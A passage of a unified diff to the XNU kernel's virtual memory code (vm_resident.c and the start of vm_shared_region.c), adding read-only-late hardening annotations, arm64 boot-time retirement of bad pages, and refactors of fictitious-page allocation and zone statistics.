vm_page_bucket_lock_count = 0; /* How big is array of locks? */ +SECURITY_READ_ONLY_LATE(vm_page_bucket_t *) vm_page_buckets; /* Array of buckets */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_bucket_count = 0; /* How big is array? */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_hash_mask; /* Mask for hash function */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_hash_shift; /* Shift for hash function */ +SECURITY_READ_ONLY_LATE(uint32_t) vm_page_bucket_hash; /* Basic bucket hash */ +SECURITY_READ_ONLY_LATE(unsigned int) vm_page_bucket_lock_count = 0; /* How big is array of locks? 
*/ #ifndef VM_TAG_ACTIVE_UPDATE #error VM_TAG_ACTIVE_UPDATE @@ -225,13 +227,14 @@ unsigned int vm_page_bucket_lock_count = 0; /* How big is array of l #error VM_MAX_TAG_ZONES #endif -boolean_t vm_tag_active_update = VM_TAG_ACTIVE_UPDATE; -lck_spin_t *vm_page_bucket_locks; +/* for debugging */ +SECURITY_READ_ONLY_LATE(bool) vm_tag_active_update = VM_TAG_ACTIVE_UPDATE; +SECURITY_READ_ONLY_LATE(lck_spin_t *) vm_page_bucket_locks; vm_allocation_site_t vm_allocation_sites_static[VM_KERN_MEMORY_FIRST_DYNAMIC + 1]; vm_allocation_site_t * vm_allocation_sites[VM_MAX_TAG_VALUE]; #if VM_MAX_TAG_ZONES -vm_allocation_zone_total_t ** vm_allocation_zone_totals; +static vm_allocation_zone_total_t **vm_allocation_zone_totals; #endif /* VM_MAX_TAG_ZONES */ vm_tag_t vm_allocation_tag_highest; @@ -244,8 +247,6 @@ vm_map_offset_t vm_page_fake_buckets_start, vm_page_fake_buckets_end; #endif /* VM_PAGE_FAKE_BUCKETS */ #endif /* VM_PAGE_BUCKETS_CHECK */ - - #if MACH_PAGE_HASH_STATS /* This routine is only for debug. It is intended to be called by * hand by a developer using a kernel debugger. This routine prints @@ -353,7 +354,6 @@ LCK_GRP_DECLARE(vm_page_lck_grp_local, "vm_page_queue_local"); LCK_GRP_DECLARE(vm_page_lck_grp_purge, "vm_page_purge"); LCK_GRP_DECLARE(vm_page_lck_grp_alloc, "vm_page_alloc"); LCK_GRP_DECLARE(vm_page_lck_grp_bucket, "vm_page_bucket"); -LCK_MTX_EARLY_DECLARE_ATTR(vm_page_alloc_lock, &vm_page_lck_grp_alloc, &vm_page_lck_attr); LCK_SPIN_DECLARE_ATTR(vm_objects_wired_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr); LCK_SPIN_DECLARE_ATTR(vm_allocation_sites_lock, &vm_page_lck_grp_bucket, &vm_page_lck_attr); @@ -1331,6 +1331,24 @@ pmap_steal_freeable_memory( return pmap_steal_memory_internal(size, TRUE); } +#if defined(__arm64__) +/* + * Retire a page at startup. + * These pages will eventually wind up on the retired_pages_object + * in vm_retire_boot_pages(). 
+ */ +static vm_page_queue_head_t vm_page_queue_retired VM_PAGE_PACKED_ALIGNED; +static void +vm_page_retire_startup(vm_page_t p) +{ + p->vmp_q_state = VM_PAGE_NOT_ON_Q; + p->vmp_error = true; + p->vmp_unusual = true; + vm_page_queue_enter(&vm_page_queue_retired, p, vmp_pageq); + printf("To be retired at boot: page at 0x%llx\n", (long long)ptoa(VM_PAGE_GET_PHYS_PAGE(p))); +} +#endif /* defined(__arm64__) */ + #if CONFIG_SECLUDED_MEMORY /* boot-args to control secluded memory */ unsigned int secluded_mem_mb = 0; /* # of MBs of RAM to seclude */ @@ -1382,8 +1400,15 @@ pmap_startup( * the memory needed to map what's being allocated, i.e. the page * table entries. So the actual number of pages we get will be * less than this. To do someday: include that in the computation. + * + * Also for ARM, we don't use the count of free_pages, but rather the + * range from last page to first page (ignore holes due to retired pages). */ +#if defined(__arm__) || defined(__arm64__) + mem_sz = pmap_free_pages_span() * (uint64_t)PAGE_SIZE; +#else /* defined(__arm__) || defined(__arm64__) */ mem_sz = pmap_free_pages() * (uint64_t)PAGE_SIZE; +#endif /* defined(__arm__) || defined(__arm64__) */ mem_sz += round_page(virtual_space_start) - virtual_space_start; /* Account for any slop */ npages = (uint_t)(mem_sz / (PAGE_SIZE + sizeof(*vm_pages))); /* scaled to include the vm_page_ts */ @@ -1509,6 +1534,9 @@ pmap_startup( #endif vm_delayed_count = 0; +#if defined(__arm64__) + vm_page_queue_init(&vm_page_queue_retired); +#endif /* defined(__arm64__) */ absolutetime_to_nanoseconds(mach_absolute_time(), &start_ns); vm_pages_count = 0; @@ -1533,9 +1561,24 @@ pmap_startup( vm_first_phys_ppnum = phys_page; patch_low_glo_vm_page_info((void *)vm_page_array_beginning_addr, (void *)vm_page_array_ending_addr, vm_first_phys_ppnum); +#if defined(__arm64__) + } else { + /* + * pmap_next_page() may skip over pages reported bad by iboot. 
+ */ + while (i < phys_page - vm_first_phys_ppnum && i < npages) { + ++vm_pages_count; + vm_page_init(&vm_pages[i], i + vm_first_phys_ppnum, FALSE); + vm_page_retire_startup(&vm_pages[i]); + ++i; + } + if (i >= npages) { + break; + } + assert(i == phys_page - vm_first_phys_ppnum); +#endif /* defined(__arm64__) */ } - assert((i + vm_first_phys_ppnum) == phys_page); -#endif +#endif /* defined(__arm__) || defined(__arm64__) */ #if defined(__x86_64__) /* The x86 clump freeing code requires increasing ppn's to work correctly */ @@ -1556,7 +1599,9 @@ pmap_startup( if (!vm_himemory_mode) { do { - vm_page_release_startup(&vm_pages[--i]); + if (!vm_pages[--i].vmp_error) { /* skip retired pages */ + vm_page_release_startup(&vm_pages[i]); + } } while (i != 0); } @@ -1603,13 +1648,15 @@ vm_page_module_init_delayed(void) * Reflect size and usage information for vm_pages[]. */ - z->countavail = (uint32_t)(vm_page_array_ending_addr - vm_pages); - z->countfree = z->countavail - vm_pages_count; + z->z_elems_avail = (uint32_t)(vm_page_array_ending_addr - vm_pages); + z->z_elems_free = z->z_elems_avail - vm_pages_count; zpercpu_get_cpu(z->z_stats, 0)->zs_mem_allocated = vm_pages_count * sizeof(struct vm_page); vm_page_array_zone_data_size = (uintptr_t)((void *)vm_page_array_ending_addr - (void *)vm_pages); vm_page_zone_pages = atop(round_page((vm_offset_t)vm_page_array_zone_data_size)); - z->page_count += vm_page_zone_pages; + z->z_wired_cur += vm_page_zone_pages; + z->z_wired_hwm = z->z_wired_cur; + z->z_va_cur = z->z_wired_cur; /* since zone accounts for these, take them out of stolen */ VM_PAGE_MOVE_STOLEN(vm_page_zone_pages); }); @@ -1636,12 +1683,23 @@ vm_page_module_init(void) ~(VM_PAGE_PACKED_PTR_ALIGNMENT - 1); vm_page_zone = zone_create_ext("vm pages", vm_page_with_ppnum_size, - ZC_ALLOW_FOREIGN | ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED | - ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) { + ZC_NOGZALLOC | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z) { #if defined(__LP64__) - 
zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #endif - zone_set_exhaustible(z, 0); + /* + * The number "10" is a small number that is larger than the number + * of fictitious pages that any single caller will attempt to allocate + * without blocking. + * + * The largest such number at the moment is kernel_memory_allocate() + * when 2 guard pages are asked. 10 is simply a somewhat larger number, + * taking into account the 50% hysteresis the zone allocator uses. + * + * Note: this works at all because the zone allocator + * doesn't ever allocate fictitious pages. + */ + z->z_elems_rsv = 10; }); } STARTUP(ZALLOC, STARTUP_RANK_SECOND, vm_page_module_init); @@ -1666,11 +1724,7 @@ vm_page_create( for (phys_page = start; phys_page < end; phys_page++) { - while ((m = (vm_page_t) vm_page_grab_fictitious_common(phys_page)) - == VM_PAGE_NULL) { - vm_page_more_fictitious(); - } - + m = vm_page_grab_fictitious_common(phys_page, TRUE); m->vmp_fictitious = FALSE; pmap_clear_noencrypt(phys_page); @@ -1681,6 +1735,38 @@ vm_page_create( } } +#if defined(__arm64__) +/* + * Like vm_page_create(), except we want to immediately retire the page, + * not put it on the free list. 
+ */ +void +vm_page_create_retired( + ppnum_t phys_page) +{ + vm_page_t m; + + m = vm_page_grab_fictitious_common(phys_page, TRUE); + m->vmp_fictitious = FALSE; + pmap_clear_noencrypt(phys_page); + m->vmp_error = true; + m->vmp_unusual = true; + vm_page_lock_queues(); + m->vmp_q_state = VM_PAGE_IS_WIRED; + m->vmp_wire_count++; + vm_page_unlock_queues(); + + lck_mtx_lock(&vm_page_queue_free_lock); + vm_page_pages++; + lck_mtx_unlock(&vm_page_queue_free_lock); + + vm_object_lock(retired_pages_object); + vm_page_insert_wired(m, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(m)), VM_KERN_MEMORY_RETIRED); + vm_object_unlock(retired_pages_object); + pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(m)); +} +#endif /* defined(__arm64__) */ + /* * vm_page_hash: * @@ -2621,43 +2707,34 @@ vm_page_init( * Remove a fictitious page from the free list. * Returns VM_PAGE_NULL if there are no free pages. */ -int c_vm_page_grab_fictitious = 0; -int c_vm_page_grab_fictitious_failed = 0; -int c_vm_page_release_fictitious = 0; -int c_vm_page_more_fictitious = 0; -vm_page_t -vm_page_grab_fictitious_common( - ppnum_t phys_addr) +static vm_page_t +vm_page_grab_fictitious_common(ppnum_t phys_addr, boolean_t canwait) { - vm_page_t m; + vm_page_t m; - if ((m = (vm_page_t)zalloc_noblock(vm_page_zone))) { + m = zalloc_flags(vm_page_zone, canwait ? 
Z_WAITOK : Z_NOWAIT); + if (m) { vm_page_init(m, phys_addr, FALSE); m->vmp_fictitious = TRUE; - - c_vm_page_grab_fictitious++; - } else { - c_vm_page_grab_fictitious_failed++; } - return m; } vm_page_t -vm_page_grab_fictitious(void) +vm_page_grab_fictitious(boolean_t canwait) { - return vm_page_grab_fictitious_common(vm_page_fictitious_addr); + return vm_page_grab_fictitious_common(vm_page_fictitious_addr, canwait); } int vm_guard_count; vm_page_t -vm_page_grab_guard(void) +vm_page_grab_guard(boolean_t canwait) { vm_page_t page; - page = vm_page_grab_fictitious_common(vm_page_guard_addr); + page = vm_page_grab_fictitious_common(vm_page_guard_addr, canwait); if (page) { OSAddAtomic(1, &vm_guard_count); } @@ -2684,91 +2761,9 @@ vm_page_release_fictitious( OSAddAtomic(-1, &vm_guard_count); } - c_vm_page_release_fictitious++; - zfree(vm_page_zone, m); } -/* - * vm_page_more_fictitious: - * - * Add more fictitious pages to the zone. - * Allowed to block. This routine is way intimate - * with the zones code, for several reasons: - * 1. we need to carve some page structures out of physical - * memory before zones work, so they _cannot_ come from - * the zone restricted submap. - * 2. the zone needs to be collectable in order to prevent - * growth without bound. These structures are used by - * the device pager (by the hundreds and thousands), as - * private pages for pageout, and as blocking pages for - * pagein. Temporary bursts in demand should not result in - * permanent allocation of a resource. - * 3. To smooth allocation humps, we allocate single pages - * with kernel_memory_allocate(), and cram them into the - * zone. - */ - -void -vm_page_more_fictitious(void) -{ - vm_offset_t addr; - kern_return_t retval; - - c_vm_page_more_fictitious++; - - /* - * Allocate a single page from the zone restricted submap. Do not wait - * if no physical pages are immediately available, and do not zero the - * space. 
We need our own blocking lock here to prevent having multiple, - * simultaneous requests from piling up on the zone restricted submap - * lock. - * Exactly one (of our) threads should be potentially waiting on the map - * lock. If winner is not vm-privileged, then the page allocation will - * fail, and it will temporarily block here in the vm_page_wait(). - */ - lck_mtx_lock(&vm_page_alloc_lock); - /* - * If another thread allocated space, just bail out now. - */ - if (os_atomic_load(&vm_page_zone->countfree, relaxed) > 5) { - /* - * The number "5" is a small number that is larger than the - * number of fictitious pages that any single caller will - * attempt to allocate. Otherwise, a thread will attempt to - * acquire a fictitious page (vm_page_grab_fictitious), fail, - * release all of the resources and locks already acquired, - * and then call this routine. This routine finds the pages - * that the caller released, so fails to allocate new space. - * The process repeats infinitely. The largest known number - * of fictitious pages required in this manner is 2. 5 is - * simply a somewhat larger number. - */ - lck_mtx_unlock(&vm_page_alloc_lock); - return; - } - - retval = kernel_memory_allocate(zone_submap(vm_page_zone), - &addr, PAGE_SIZE, 0, KMA_ZERO | KMA_KOBJECT | KMA_NOPAGEWAIT, - VM_KERN_MEMORY_ZONE); - - if (retval != KERN_SUCCESS) { - /* - * No page was available. Drop the - * lock to give another thread a chance at it, and - * wait for the pageout daemon to make progress. - */ - lck_mtx_unlock(&vm_page_alloc_lock); - vm_page_wait(THREAD_UNINT); - return; - } - - zcram(vm_page_zone, addr, PAGE_SIZE); - - lck_mtx_unlock(&vm_page_alloc_lock); -} - - /* * vm_pool_low(): * @@ -2776,7 +2771,7 @@ vm_page_more_fictitious(void) * can get memory without blocking. Advisory only, since the * situation may change under us. */ -int +bool vm_pool_low(void) { /* No locking, at worst we will fib. 
*/ @@ -3053,15 +3048,12 @@ vm_page_grablo(void) VM_PAGE_ZERO_PAGEQ_ENTRY(mem); - disable_preemption(); - *PERCPU_GET(vm_page_grab_count) += 1; + counter_inc(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, 0, 1, 0, 0); - enable_preemption(); return mem; } - /* * vm_page_grab: * @@ -3121,7 +3113,7 @@ return_page_from_cpu_list: vm_page_grab_diags(); vm_offset_t pcpu_base = current_percpu_base(); - *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1; + counter_inc_preemption_disabled(&vm_page_grab_count); *PERCPU_GET_WITH_BASE(pcpu_base, free_pages) = mem->vmp_snext; VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); @@ -3201,11 +3193,9 @@ return_page_from_cpu_list: if (mem) { VM_CHECK_MEMORYSTATUS; - disable_preemption(); vm_page_grab_diags(); - *PERCPU_GET(vm_page_grab_count) += 1; + counter_inc(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); - enable_preemption(); return mem; } @@ -3333,7 +3323,7 @@ return_page_from_cpu_list: * satisfy this request */ vm_page_grab_diags(); - *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1; + counter_inc_preemption_disabled(&vm_page_grab_count); VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0); mem = head; assert(mem->vmp_q_state == VM_PAGE_ON_FREE_LOCAL_Q); @@ -3891,8 +3881,6 @@ vm_page_wait( * context switch. Could be a perf. issue. */ - counter(c_vm_page_wait_block++); - if (need_wakeup) { thread_wakeup((event_t)&vm_page_free_wanted); } @@ -3921,7 +3909,6 @@ vm_page_wait( wait_result = assert_wait(wait_event, interruptible); lck_mtx_unlock(&vm_page_queue_free_lock); - counter(c_vm_page_wait_block++); if (need_wakeup) { thread_wakeup((event_t)&vm_page_free_wanted); @@ -3980,35 +3967,6 @@ vm_page_alloc( return mem; } -/* - * vm_page_alloc_guard: - * - * Allocate a fictitious page which will be used - * as a guard page. 
The page will be inserted into - * the object and returned to the caller. - */ - -vm_page_t -vm_page_alloc_guard( - vm_object_t object, - vm_object_offset_t offset) -{ - vm_page_t mem; - - vm_object_lock_assert_exclusive(object); - mem = vm_page_grab_guard(); - if (mem == VM_PAGE_NULL) { - return VM_PAGE_NULL; - } - - vm_page_insert(mem, object, offset); - - return mem; -} - - -counter(unsigned int c_laundry_pages_freed = 0; ) - /* * vm_page_free_prepare: * @@ -4051,7 +4009,6 @@ vm_page_free_prepare_queues( * from its pageout queue and adjust the laundry accounting */ vm_pageout_steal_laundry(mem, TRUE); - counter(++c_laundry_pages_freed); } vm_page_queues_remove(mem, TRUE); @@ -5806,7 +5763,8 @@ vm_page_find_contiguous( unsigned int idx_last_contig_page_found = 0; int free_considered = 0, free_available = 0; int substitute_needed = 0; - boolean_t wrapped, zone_gc_called = FALSE; + int zone_gc_called = 0; + boolean_t wrapped; kern_return_t kr; #if DEBUG clock_sec_t tv_start_sec = 0, tv_end_sec = 0; @@ -6445,7 +6403,7 @@ done_scanning: #if MACH_ASSERT vm_page_verify_free_lists(); #endif - if (m == NULL && zone_gc_called == FALSE) { + if (m == NULL && zone_gc_called < 2) { printf("%s(num=%d,low=%d): found %d pages at 0x%llx...scanned %d pages... yielded %d times... dumped run %d times... stole %d pages... stole %d compressed pages... wired count is %d\n", __func__, contig_pages, max_pnum, npages, (vm_object_offset_t)start_pnum << PAGE_SHIFT, scanned, yielded, dumped_run, stolen_pages, compressed_pages, vm_page_wire_count); @@ -6454,9 +6412,9 @@ done_scanning: (void)(*consider_buffer_cache_collect)(1); } - consider_zone_gc(FALSE); + zone_gc(zone_gc_called ? ZONE_GC_DRAIN : ZONE_GC_TRIM); - zone_gc_called = TRUE; + zone_gc_called++; printf("vm_page_find_contiguous: zone_gc called... 
wired count is %d\n", vm_page_wire_count); goto full_scan_again; @@ -6704,36 +6662,76 @@ vm_page_do_delayed_work( kern_return_t vm_page_alloc_list( - int page_count, - int flags, - vm_page_t *list) + int page_count, + kma_flags_t flags, + vm_page_t *list) { - vm_page_t lo_page_list = VM_PAGE_NULL; + vm_page_t page_list = VM_PAGE_NULL; vm_page_t mem; - int i; + kern_return_t kr = KERN_SUCCESS; + int page_grab_count = 0; + mach_vm_size_t map_size = ptoa_64(page_count); +#if DEVELOPMENT || DEBUG + task_t task = current_task(); +#endif /* DEVELOPMENT || DEBUG */ - if (!(flags & KMA_LOMEM)) { - panic("vm_page_alloc_list: called w/o KMA_LOMEM"); - } + for (int i = 0; i < page_count; i++) { + for (;;) { + if (flags & KMA_LOMEM) { + mem = vm_page_grablo(); + } else { + mem = vm_page_grab(); + } - for (i = 0; i < page_count; i++) { - mem = vm_page_grablo(); + if (mem != VM_PAGE_NULL) { + break; + } - if (mem == VM_PAGE_NULL) { - if (lo_page_list) { - vm_page_free_list(lo_page_list, FALSE); + if (flags & KMA_NOPAGEWAIT) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; + } + if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; } - *list = VM_PAGE_NULL; + /* VM privileged threads should have waited in vm_page_grab() and not get here. 
*/ + assert(!(current_thread()->options & TH_OPT_VMPRIV)); - return KERN_RESOURCE_SHORTAGE; + uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE; + if (unavailable > max_mem || map_size > (max_mem - unavailable)) { + kr = KERN_RESOURCE_SHORTAGE; + goto out; + } + VM_PAGE_WAIT(); } - mem->vmp_snext = lo_page_list; - lo_page_list = mem; + + page_grab_count++; + mem->vmp_snext = page_list; + page_list = mem; } - *list = lo_page_list; - return KERN_SUCCESS; + if (KMA_ZERO & flags) { + for (mem = page_list; mem; mem = mem->vmp_snext) { + vm_page_zero_fill(mem); + } + } + +out: +#if DEBUG || DEVELOPMENT + if (task != NULL) { + ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count); + } +#endif + + if (kr == KERN_SUCCESS) { + *list = page_list; + } else { + vm_page_free_list(page_list, FALSE); + } + + return kr; } void @@ -7200,7 +7198,7 @@ hibernate_flush_memory() orig_wire_count = vm_page_wire_count; (void)(*consider_buffer_cache_collect)(1); - consider_zone_gc(FALSE); + zone_gc(ZONE_GC_DRAIN); HIBLOG("hibernate_flush_memory: buffer_cache_gc freed up %d wired pages\n", orig_wire_count - vm_page_wire_count); @@ -9150,36 +9148,45 @@ vm_allocation_zones_init(void) vm_allocation_zone_totals[VM_KERN_MEMORY_KALLOC] = (vm_allocation_zone_total_t *) addr; } -void -vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx) +__attribute__((noinline)) +static vm_tag_t +vm_tag_zone_stats_alloc(vm_tag_t tag, zalloc_flags_t flags) { - vm_allocation_zone_total_t * zone; + vm_allocation_zone_total_t *stats; + vm_size_t size = sizeof(*stats) * VM_MAX_TAG_ZONES; + stats = kheap_alloc(KHEAP_DATA_BUFFERS, size, + Z_VM_TAG(VM_KERN_MEMORY_DIAG) | Z_ZERO | flags); + if (!stats) { + return VM_KERN_MEMORY_NONE; + } + if (!os_atomic_cmpxchg(&vm_allocation_zone_totals[tag], NULL, stats, release)) { + kheap_free(KHEAP_DATA_BUFFERS, stats, size); + } + return tag; +} + +vm_tag_t +vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags) +{ 
assert(VM_KERN_MEMORY_NONE != tag); assert(tag < VM_MAX_TAG_VALUE); if (zidx >= VM_MAX_TAG_ZONES) { - return; + return VM_KERN_MEMORY_NONE; } - zone = vm_allocation_zone_totals[tag]; - if (!zone) { - zone = kalloc_tag(VM_MAX_TAG_ZONES * sizeof(*zone), VM_KERN_MEMORY_DIAG); - if (!zone) { - return; - } - bzero(zone, VM_MAX_TAG_ZONES * sizeof(*zone)); - if (!OSCompareAndSwapPtr(NULL, zone, &vm_allocation_zone_totals[tag])) { - kfree(zone, VM_MAX_TAG_ZONES * sizeof(*zone)); - } + if (__probable(vm_allocation_zone_totals[tag])) { + return tag; } + return vm_tag_zone_stats_alloc(tag, zflags); } void -vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste) +vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta) { - vm_allocation_zone_total_t * zone; - uint32_t new; + vm_allocation_zone_total_t *stats; + vm_size_t value; assert(VM_KERN_MEMORY_NONE != tag); assert(tag < VM_MAX_TAG_VALUE); @@ -9188,30 +9195,16 @@ vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwas return; } - zone = vm_allocation_zone_totals[tag]; - assert(zone); - zone += zidx; + stats = vm_allocation_zone_totals[tag]; + assert(stats); + stats += zidx; - /* the zone is locked */ + value = os_atomic_add(&stats->vazt_total, delta, relaxed); if (delta < 0) { - assertf(zone->total >= ((uint64_t)-delta), "zidx %d, tag %d, %p", zidx, tag, zone); - zone->total += delta; - } else { - zone->total += delta; - if (zone->total > zone->peak) { - zone->peak = zone->total; - } - if (dwaste) { - new = zone->waste; - if (zone->wastediv < 65536) { - zone->wastediv++; - } else { - new -= (new >> 16); - } - __assert_only bool ov = os_add_overflow(new, dwaste, &new); - assert(!ov); - zone->waste = new; - } + assertf((long)value >= 0, "zidx %d, tag %d, %p", zidx, tag, stats); + return; + } else if (os_atomic_load(&stats->vazt_peak, relaxed) < value) { + os_atomic_max(&stats->vazt_peak, value, relaxed); } } @@ -9416,19 +9409,16 @@ 
process_account(mach_memory_info_t * info, unsigned int num_info, && (zone = vm_allocation_zone_totals[idx]) && (nextinfo < num_info)) { for (zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) { - if (!zone[zidx].peak) { + if (!zone[zidx].vazt_peak) { continue; } info[nextinfo] = info[idx]; info[nextinfo].zone = (uint16_t)zone_index_from_tag_index(zidx, &elem_size); info[nextinfo].flags &= ~VM_KERN_SITE_WIRED; info[nextinfo].flags |= VM_KERN_SITE_ZONE; - info[nextinfo].size = zone[zidx].total; - info[nextinfo].peak = zone[zidx].peak; + info[nextinfo].size = zone[zidx].vazt_total; + info[nextinfo].peak = zone[zidx].vazt_peak; info[nextinfo].mapped = 0; - if (zone[zidx].wastediv) { - info[nextinfo].collectable_bytes = ((zone[zidx].waste * zone[zidx].total / elem_size) / zone[zidx].wastediv); - } nextinfo++; } } @@ -9490,9 +9480,7 @@ vm_page_diagnose_estimate(void) continue; } for (uint32_t zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) { - if (zone[zidx].peak) { - count++; - } + count += (zone[zidx].vazt_peak != 0); } } #endif @@ -9522,7 +9510,7 @@ vm_page_diagnose_zone_stats(mach_memory_info_t *info, zone_stats_t zstats, static void vm_page_diagnose_zone(mach_memory_info_t *info, zone_t z) { - vm_page_diagnose_zone_stats(info, z->z_stats, z->percpu); + vm_page_diagnose_zone_stats(info, z->z_stats, z->z_percpu); snprintf(info->name, sizeof(info->name), "%s%s[raw]", zone_heap_name(z), z->z_name); } @@ -9562,13 +9550,13 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone return KERN_ABORTED; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX wired_size = ptoa_64(vm_page_wire_count); wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count); -#else +#else /* !XNU_TARGET_OS_OSX */ wired_size = ptoa_64(vm_page_wire_count + vm_lopage_free_count + vm_page_throttled_count); wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count + vm_page_throttled_count); -#endif +#endif /* !XNU_TARGET_OS_OSX */ 
wired_managed_size = ptoa_64(vm_page_wire_count - vm_page_wire_count_initial); wired_size += booter_size; @@ -9643,7 +9631,7 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone for (; zv; zv = zv->zv_next) { vm_page_diagnose_zone_stats(counts + i, zv->zv_stats, - z->percpu); + z->z_percpu); snprintf(counts[i].name, sizeof(counts[i].name), "%s%s[%s]", zone_heap_name(z), z->z_name, zv->zv_name); i++; @@ -9827,3 +9815,39 @@ stop_secluded_suppression(task_t task) } #endif /* CONFIG_SECLUDED_MEMORY */ + +/* + * Move the list of retired pages on the vm_page_queue_retired to + * their final resting place on retired_pages_object. + */ +void +vm_retire_boot_pages(void) +{ +#if defined(__arm64__) + vm_page_t p; + + vm_object_lock(retired_pages_object); + while (!vm_page_queue_empty(&vm_page_queue_retired)) { + vm_page_queue_remove_first(&vm_page_queue_retired, p, vmp_pageq); + assert(p != NULL); + vm_page_lock_queues(); + p->vmp_q_state = VM_PAGE_IS_WIRED; + p->vmp_wire_count++; + vm_page_unlock_queues(); + vm_page_insert_wired(p, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(p)), VM_KERN_MEMORY_RETIRED); + vm_object_unlock(retired_pages_object); + pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(p)); + vm_object_lock(retired_pages_object); + } + vm_object_unlock(retired_pages_object); +#endif /* defined(__arm64__) */ +} + +/* + * Returns the current number of retired pages, used for sysctl. 
+ */ +uint32_t +vm_retired_pages_count(void) +{ + return retired_pages_object->resident_page_count; +} diff --git a/osfmk/vm/vm_shared_region.c b/osfmk/vm/vm_shared_region.c index 115b24713..fb594cd86 100644 --- a/osfmk/vm/vm_shared_region.c +++ b/osfmk/vm/vm_shared_region.c @@ -143,16 +143,23 @@ int shared_region_persistence = 0; /* no by default */ /* delay in seconds before reclaiming an unused shared region */ TUNABLE_WRITEABLE(int, shared_region_destroy_delay, "vm_shared_region_destroy_delay", 120); -struct vm_shared_region *init_task_shared_region = NULL; +/* + * Cached pointer to the most recently mapped shared region from PID 1, which should + * be the most commonly mapped shared region in the system. There are many processes + * which do not use this, for a variety of reasons. + * + * The main consumer of this is stackshot. + */ +struct vm_shared_region *primary_system_shared_region = NULL; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX /* * Only one cache gets to slide on Desktop, since we can't * tear down slide info properly today and the desktop actually * produces lots of shared caches. */ boolean_t shared_region_completed_slide = FALSE; -#endif +#endif /* XNU_TARGET_OS_OSX */ /* this lock protects all the shared region data structures */ static LCK_GRP_DECLARE(vm_shared_region_lck_grp, "vm shared region"); @@ -203,10 +210,10 @@ static kern_return_t vm_shared_region_slide_mapping( vm_prot_t prot); /* forward */ static int __commpage_setup = 0; -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX static int __system_power_source = 1; /* init to extrnal power source */ static void post_sys_powersource_internal(int i, int internal); -#endif +#endif /* XNU_TARGET_OS_OSX */ extern u_int32_t random(void); @@ -244,75 +251,6 @@ vm_shared_region_get( return shared_region; } -/* - * Get the base address of the shared region. - * That's the address at which it needs to be mapped in the process's address - * space. 
- * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. - */ -mach_vm_offset_t -vm_shared_region_base_address( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> base_address(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: base_address(%p) <- 0x%llx\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (long long)shared_region->sr_base_address)); - return shared_region->sr_base_address; -} - -/* - * Get the size of the shared region. - * That's the size that needs to be mapped in the process's address - * space. - * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. - */ -mach_vm_size_t -vm_shared_region_size( - vm_shared_region_t shared_region) -{ - SHARED_REGION_TRACE_DEBUG( - ("shared_region: -> size(%p)\n", - (void *)VM_KERNEL_ADDRPERM(shared_region))); - assert(shared_region->sr_ref_count > 1); - SHARED_REGION_TRACE_DEBUG( - ("shared_region: size(%p) <- 0x%llx\n", - (void *)VM_KERNEL_ADDRPERM(shared_region), - (long long)shared_region->sr_size)); - return shared_region->sr_size; -} - -/* - * Get the memory entry of the shared region. - * That's the "memory object" that needs to be mapped in the process's address - * space. - * No need to lock since this data is set when the shared region is - * created and is never modified after that. The caller must hold an extra - * reference on the shared region to prevent it from being destroyed. 
